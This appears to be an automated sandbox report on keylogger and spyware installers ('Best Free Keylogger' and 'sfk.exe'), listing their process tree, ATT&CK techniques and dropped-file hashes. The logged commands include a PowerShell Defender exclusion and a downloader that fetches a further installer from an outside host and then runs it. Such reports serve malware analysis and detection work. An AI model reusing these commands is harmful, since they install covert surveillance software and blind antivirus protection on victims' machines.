"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:1
2⤵
PID:2676

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5476 /prefetch:1
2⤵
PID:1468

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5388 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1488

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5804 /prefetch:1
2⤵
PID:2056

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5860 /prefetch:1
2⤵
PID:1776

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6100 /prefetch:8
2⤵
PID:2564

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6208 /prefetch:8
2⤵
PID:1796

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=68 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6108 /prefetch:1
2⤵
PID:1972

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5552 /prefetch:1
2⤵
PID:2300

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6188 /prefetch:8
2⤵
PID:836

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6036 /prefetch:8
2⤵
PID:2844

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=72 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6140 /prefetch:1
2⤵
PID:2488

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1556 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3048

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3808 /prefetch:8
2⤵
PID:1540

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4764 /prefetch:8
2⤵
PID:1556

C:\Users\Admin\Downloads\installer_trial.exe
"C:\Users\Admin\Downloads\installer_trial.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1732

C:\Users\Admin\AppData\Local\Temp\is-QNIHC.tmp\installer_trial.tmp
"C:\Users\Admin\AppData\Local\Temp\is-QNIHC.tmp\installer_trial.tmp" /SL5="$B01AC,993561,780800,C:\Users\Admin\Downloads\installer_trial.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
PID:1796

C:\Users\Admin\AppData\Local\Temp\is-UTBVS.tmp\_isetup\_setup64.tmp
helper 105 0x1C
4⤵
- Executes dropped EXE
PID:1712

C:\Program Files\Best Free Keylogger\7za.exe
"C:\Program Files\Best Free Keylogger\7za.exe" x "C:\Program Files\Best Free Keylogger\base components" -p"X8g8y9P58X64FwY8FUNn" -aoa -o"C:\ProgramData\BFKData"
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1072

C:\Program Files\Best Free Keylogger\7za.exe
"C:\Program Files\Best Free Keylogger\7za.exe" x "C:\Program Files\Best Free Keylogger\runtime package" -p"HRLefJpaPOI1gBmscwqn" -aoa
4⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:1988

C:\Program Files\Best Free Keylogger\syscrb.exe
"C:\Program Files\Best Free Keylogger\syscrb.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1968

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=76 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5928 /prefetch:1
2⤵
PID:1384

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=77 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5616 /prefetch:1
2⤵
PID:780

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5932 /prefetch:8
2⤵
PID:1824

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6012 /prefetch:8
2⤵
PID:2236

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=80 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5820 /prefetch:1
2⤵
PID:2060

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=81 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6212 /prefetch:1
2⤵
PID:2684

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4944 /prefetch:8
2⤵
PID:2476

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4316 /prefetch:8
2⤵
PID:2020

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=84 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6280 /prefetch:1
2⤵
PID:2404

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5348 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1484

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3276 /prefetch:8
2⤵
PID:2240

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5268 /prefetch:8
2⤵
PID:1724

C:\Users\Admin\Downloads\sfk.exe
"C:\Users\Admin\Downloads\sfk.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2280

C:\Users\Admin\AppData\Local\Temp\is-3HESG.tmp\sfk.tmp
"C:\Users\Admin\AppData\Local\Temp\is-3HESG.tmp\sfk.tmp" /SL5="$C0236,2326339,887296,C:\Users\Admin\Downloads\sfk.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1704

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\is-D1OQ6.tmp\pswd.cmd
4⤵
PID:1700

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\'
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2328

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-D1OQ6.tmp\lnk.cmd""
4⤵
- Loads dropped DLL
PID:1384

C:\Users\Admin\AppData\Local\Temp\is-D1OQ6.tmp\qrl.exe
qrl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o lnk https://securcdn.com/loader/link.php?prg_id=sfk
5⤵
- Executes dropped EXE
PID:1132

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c C:\Users\Admin\AppData\Local\Temp\is-D1OQ6.tmp\d.cmd
4⤵
- Loads dropped DLL
PID:2132

C:\Users\Admin\AppData\Local\Temp\is-D1OQ6.tmp\qrl.exe
qrl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\ProgramData\Security Monitor\bin\sfk.exe" https://sdzn-download.spyrix-sfk.com/download/sfk/sfk_setup.exe
5⤵
- Executes dropped EXE
PID:836

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-D1OQ6.tmp\r.cmd""
4⤵
- Loads dropped DLL
PID:2904

C:\ProgramData\Security Monitor\bin\sfk.exe
"C:\ProgramData\Security Monitor\bin\sfk.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:316

C:\Users\Admin\AppData\Local\Temp\is-GJM7K.tmp\sfk.tmp
"C:\Users\Admin\AppData\Local\Temp\is-GJM7K.tmp\sfk.tmp" /SL5="$30B44,24979982,227328,C:\ProgramData\Security Monitor\bin\sfk.exe"
6⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
PID:2956

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=88 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5888 /prefetch:1
2⤵
PID:1804

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4784 /prefetch:8
2⤵
PID:3012

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5272 /prefetch:8
2⤵
PID:2140

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3744 /prefetch:8
2⤵
PID:2780

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1004,7278840199828274264,2237956333232651156,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5052 /prefetch:8
2⤵
PID:1536

C:\Program Files\Google\Chrome\Application\89.0.4389.114\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\89.0.4389.114\elevation_service.exe"
1⤵
- Drops file in Program Files directory
PID:2280

C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir2280_1353327787\ChromeRecovery.exe
"C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir2280_1353327787\ChromeRecovery.exe" --appguid={8A69D345-D564-463c-AFF1-A69D9E530F96} --browser-version=89.0.4389.114 --sessionid={77a03df7-5ec7-4fc2-b7e2-1b19bc58259a} --system
2⤵
- Executes dropped EXE
PID:1012

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Query Registry

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
Filesize
40B

MD5
ca0c469b8152e7e371cf08d73b026433

SHA1
07a87b72da129c4af371a735398bd1aefdb0e74a

SHA256
49bf5be3f0eae3a1851a7ac6e98c2aacfd41d04b0bee3f34ea75d3fe76ac4996

SHA512
2a051c82401a439602f6400b7af49353c869f464815dbefe068c3ad6249f7875e42d4c486dfdc22e60d54f711afc339491bb74922bba551df98e9ec0780dbafa

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
Filesize
40B

MD5
ca0c469b8152e7e371cf08d73b026433

SHA1
07a87b72da129c4af371a735398bd1aefdb0e74a

SHA256
49bf5be3f0eae3a1851a7ac6e98c2aacfd41d04b0bee3f34ea75d3fe76ac4996

SHA512
2a051c82401a439602f6400b7af49353c869f464815dbefe068c3ad6249f7875e42d4c486dfdc22e60d54f711afc339491bb74922bba551df98e9ec0780dbafa

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Favicons
Filesize
24KB

MD5
0040a957556fd50e70b0c91a9d696332

SHA1
c290bbe04f25b57ba61cc371a16f9051a57d1cb9

SHA256
5dcd39cc8b9ba22fcccff4bbf320deacc8789d22c7361a70f0616a6e52a9e02d

SHA512
f70ff021f983377b1252520314da5770aec19215c6878199c271720dcee27c0020841d47f5c977718cda6ea844643158e98c56e807f7372ace520821541bf3d7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\History
Filesize
124KB

MD5
ca2c01c1ceead4305bffb0ae98a7c197

SHA1
e7e920376ac620d6ae863782765843376208693c

SHA256
f8fbeab412ed57b9b44a9d757ce492b8cca9588623ba078d6d0fbb12fb6e2d0d

SHA512
98c91a437ce250c97ce68e520799a95ffa09e1af4c069e39f2d9acf6920af981b7cc4c542d6189cd8989d19edd6e6d7f83701ef1d2e3c1304a76defc696d4dba

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
6KB

MD5
fa8d76f410260171d9b02aa236d8c0c4

SHA1
add04dcf590db91fdcce1510ca5beae13fc7aa98

SHA256
d7395222cc6afc703ffc53df0bf1f73b5f78b22a0b9e16286daed054be650a61

SHA512
7a849895de3abcf4cdb1d82a4768da411f871dc012438db5e3aa03dfaad2005c75ea0edc102b076fb3c9340aeafc02e57f6ed3bd7875ae975f1c3512dff12288

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
Filesize
15KB

MD5
2184ad068d2c584156eeb0afce63559c

SHA1
0731b7957684e17dfec7d0161acecd3f6d35acc3

SHA256
67d0aa67d3de07595b10e4a195926b5fc7106af221eca6884b3b9ea12c57491a

SHA512
5812036d287eaa46dbc90b2b473a12c5a853ecf7073e7fc6837cfcffade0c9560fd33023fb80725f681b1dc08629b5103b851625b29b3cbcc4ac9b3f16c232cd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\000003.log
Filesize
116B

MD5
14ac8c0eb15f9f38f4936536c28e1cfc

SHA1
bc01f188e72f4033e189a91565e6fd8891aef62d

SHA256
27545ca90b1545b61131fbd702c4d371fb1c6d3577f9f48ee26ff791fb7e954a

SHA512
bece63607da0bd9ff98f5ebd0988e85359e2b8417fe69a23075b4a41f2577fabb85424a19b2071821a5403a7d2426c79fafc5f6114ffae9773b25b33e942e666

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOG
Filesize
345B

MD5
de50d1afdb69c4cdba4f2fdf37b1b823

SHA1
7e578ed162f4ccc891b4ca3eb893778ba580ed78

SHA256
8b425ea2abbe2ce415b97a5c2a136bade62b2fe37448cd0137dd9aa6451c2af7

SHA512
dcf2af7473772d0f378e39e612216cba3545967450b10c9b5b824760fea6e040fcfebc850ae2369b043514627057e2f7bade154414b46801a02918b393e1fb3c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000003.log
Filesize
160B

MD5
de92ad90be6d3364745b2f73f4c3cf73

SHA1
9158681463bd30e5af4dda4baac81f93cedbda77

SHA256
0025a3e0d3b834401b3b5f820e1991ef7e810d9a4b8b6b579e6301c94e7031a0

SHA512
9e81cefc195439439f4b23ee7696309d7bc3c08e5b444d2abde26d2f12b2d3bcfd124fb9a2d40c6389e9f787741676fad366a2e9982674e7b931028c014d8a79

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG
Filesize
321B

MD5
8431b5aa4dd7d61bf7e88c66879128cc

SHA1
491b612f82fb90940fa7d7e357c37bfa2dc4ee21

SHA256
47460132d2125206e083b400805c5a8c27d33c670c4e709dd4b974c5ad587a15

SHA512
dcf2e9f8095f29f3f77f4e8cddc1702ebcef5fcf9a36e2c23d61ea47b4e6ea621835c91c5ae8f59b1fea42bbae6405d674a54a1a2e4489e72829c3d4a22405df

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Visited Links
Filesize
128KB

MD5
6822726bab2d33a7b6b8fcd800667ac5

SHA1
aacbebbd4f03de90f83bba722817c6e1e6736ddf

SHA256
636f5a2b9dc2f83fb8d488cda8369d07e3bce057061ff14cf6a83c4622d5fab8

SHA512
dd7bbd0dc05477128d543117cc5edc89adf3a5a0e7462e241dd7234234df9550930cc4465927b8838a57942f422b182bfe81938bbfcadf05a3231e651a32ac5f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Data
Filesize
88KB

MD5
ec1af199a4e1bcb017a08a98b758e31c

SHA1
731a6831f5d93277267ffa2e4a4dc4bc2e674011

SHA256
6d52c6ad64fa5754488614a7cdfc75ec172de027962063c58a86255cd3d3ae11

SHA512
a41add958e5a187fa05213afc7ce8c33cc2ebd3f90a81a9220c5efa33779a691d25e01d0d2d4d48f8e7055d60dbd47d41d7421f3acf90f606f53affe0ae80cc4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Last Version
Filesize
13B

MD5
b63048c4e7e52c52053d25da30d9c5ab

SHA1
679a44d402f5ec24605719e06459f5a707989187

SHA256
389caa40ea458e84bc624a9af1e0dec60fa652b2db2b81c09b1dfe22822cc3d1

SHA512
e86c58c5a25e24f21ad79ed526a90c120a09c115f4820663bd2ebbc59e7bb1c4c418267eb77645522aa20b2c1b53fba8e31690db7bae9b21e4eff3db06316359

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
Filesize
111KB

MD5
8cac32bc526fa6d988ea9861c554c29f

SHA1
590c5fd6593cd2f22b87b818d3a88fbeb286ee45

SHA256
2cd750dc0779937da03ae75ffd3a1c53a1624c5d6e204d32dfe402ad204cc99d

SHA512
45b57e939efcc7a2cd691b9ad1badde22861b5a4617691ac98f6592931d29f5e241059749ee03cb10ec67c9661875cc616360ffeb59237897fa9342c856199cb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
Filesize
111KB

MD5
8d3264f55f20631d56034ba1db769402

SHA1
a851be4e483042dff35013f8d7839387b9119fa7

SHA256
528be2788966249c6a2cfdad1a2629bda2a3ae4e52e6cb68e5fee0b8d16543ff

SHA512
8999b368f6f6ae277fefc5a77bbfe02141867100a679104cfa7c8e7cd1df6eea8e31f461b32d1e5b6cc5045eef848eac22920c680f9b239bdf0914b5702dae68

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Safe Browsing\CertCsdDownloadWhitelist.store
Filesize
75B

MD5
0997dd1eb3560eb6a344f9987fc2fb32

SHA1
8247b9d7ea4f2d353cb87f9b2d2523e45cc5ef89

SHA256
66178c3d5d845ec3b584894a90491f3b961fd1d580081776c34ab7d324fc6216

SHA512
0dd4a4d0adcbc474cd59cc45fc895218e5b774b14bb6c3bc05eb13f05c1a1c7b5d3cbb0129ea9782106cd407e331cb362de6b10c91c347d7cfd9420a07808a7d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Safe Browsing\ChromeExtMalware.store
Filesize
1.7MB

MD5
01bca15633e9be3f76a60b59d938e163

SHA1
7cce212d5915a8bfe0dd996a9301d5b1621a3966

SHA256
cdaab7dd89a6d546117af8469187158ce568404cfa8031e85b6ed3f69c0daa68

SHA512
dfa3d4f53bac6289c0172b02b283d2cbe49ea74f12d60bce8d9726308b4ac79a6352541993a3ac0eb7061cd5b818373c6f402ed20937b8fc786b2d9c80afe45b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Safe Browsing\ChromeUrlClientIncident.store
Filesize
717B

MD5
91fa3796e3b48d5df31e2def32dd37ff

SHA1
a4db4394602e9a0cee3dbb94c05ce68b028dfa34

SHA256
3db31e705d3a3af44ff7b5e736630947df2bd1ddc427954a87a7368b956b58aa

SHA512
54d22aac10f78b175aec05b68bc8a98da2d9d2dfb9f14263151c9051e7079b4555628d17cff37de9da76854dfdd061c165d0fdc9f82b3d5ddf99cdf4ba1e900c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Safe Browsing\IpMalware.store
Filesize
106B

MD5
ab3d7e42cfa70ff9879c070f8dfcc7cb

SHA1
4d13bc1b814189026e0699b14f65fba020af0233

SHA256
39d2c8c8bbe05790b8b04fafb99f3dda7aacfdca8989835273a8446a252aaca9

SHA512
f9857d816e6bb114d551de1ba4c0f3123d46cb2cc6eca3a31084b6495f4d99cd0d2b72e5febc183c89eda6d548f1f0b9fed4823f94b4fc3fcbba396b5fc6b567

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlMalBin.store
Filesize
1.0MB

MD5
5cf8a558467ddd30185bba5a5d3cc58e

SHA1
ed35539236bf6bdcc5d45cdcb07a91e5c9049580

SHA256
5ac7c3baf0884b150039c89b3c2472653b70707a24462f651a57554b91188d83

SHA512
74cce07465d673838d3bc9f22e9306420cbe118f013ad0656b12cee20b2b84e56c9616aed035a095fe2013f8d4f80134ec3efc487b1c5b311aa8758c1416f095

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlMalware.store
Filesize
321KB

MD5
0aa641df38e1de78e430a932b47d43ed

SHA1
66f344562bb1ae6b38cbb38ea91628c289e65969

SHA256
80eadf40b0699bd85b2f30d4632b44ca4de5e3838f198a671f0bc568c337da1d

SHA512
1da58540d95837e267ee5bc23b89618dc73b2796e8d9993b926f7d7c687b3017912962c0c16c67dd611300df536af40b7aedaaa10cb3703aa6bf52304cdd35bd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlSoceng.store
Filesize
26.3MB

MD5
a0d5c8332d0bc896c98e10b6794e077e

SHA1
a40798656034bbd3e39d450b46a711b2929ef978

SHA256
af479bc65c73bc721eff119601e8011c564e6e0f173f47acb615ac51a134aa9f

SHA512
934ecb4c50e85c642426954eef99d5b5b6f448ef9b9970bf219a5d7a5686f7e9801d15a4b97f5b138afb87868deb3c39b2f073aad51314e6c9e49073bc49ebe0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlUws.store
Filesize
111KB

MD5
90f7d863e6b094c182368af346933a4c

SHA1
0ef7092212868446ccb714a402916387891ec5df

SHA256
f56c5d88b1b530c07b4c50a3f0320122e81dd9530bb877d68af7b1dc4773cf46

SHA512
5b03e8a52523c67f9ae76f91fa43cfb01ffe4de967836d5dcce555a5d75fe2617600f4a783b0ca10c2469f63a5ef4e9f7e112a1e49a420d49e530d8a654dbb78

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_1
Filesize
264KB

MD5
a68c54e86da9910d4b68fedc9912eb1c

SHA1
00886342735e41ea3a863bc353246dfca1dcba26

SHA256
635c2d2d3489d34ae12494ccbc8a813f9e0d68eaa885e8952bcc8c5d6b15711a

SHA512
9f60a7f3a326a12e16af740ee9ce368cc1eb289b480e13a3db41844a81ca2c466794048b2bd6747cad94d953aa144eb79a7a1549515b09d0d65050156fa5f903

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI16642\python310.dll
Filesize
1.4MB

MD5
69d4f13fbaeee9b551c2d9a4a94d4458

SHA1
69540d8dfc0ee299a7ff6585018c7db0662aa629

SHA256
801317463bd116e603878c7c106093ba7db2bece11e691793e93065223fc7046

SHA512
8e632f141daf44bc470f8ee677c6f0fdcbcacbfce1472d928576bf7b9f91d6b76639d18e386d5e1c97e538a8fe19dd2d22ea47ae1acf138a0925e3c6dd156378

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI22322\python310.dll
Filesize
1.4MB

MD5
69d4f13fbaeee9b551c2d9a4a94d4458

SHA1
69540d8dfc0ee299a7ff6585018c7db0662aa629

SHA256
801317463bd116e603878c7c106093ba7db2bece11e691793e93065223fc7046

SHA512
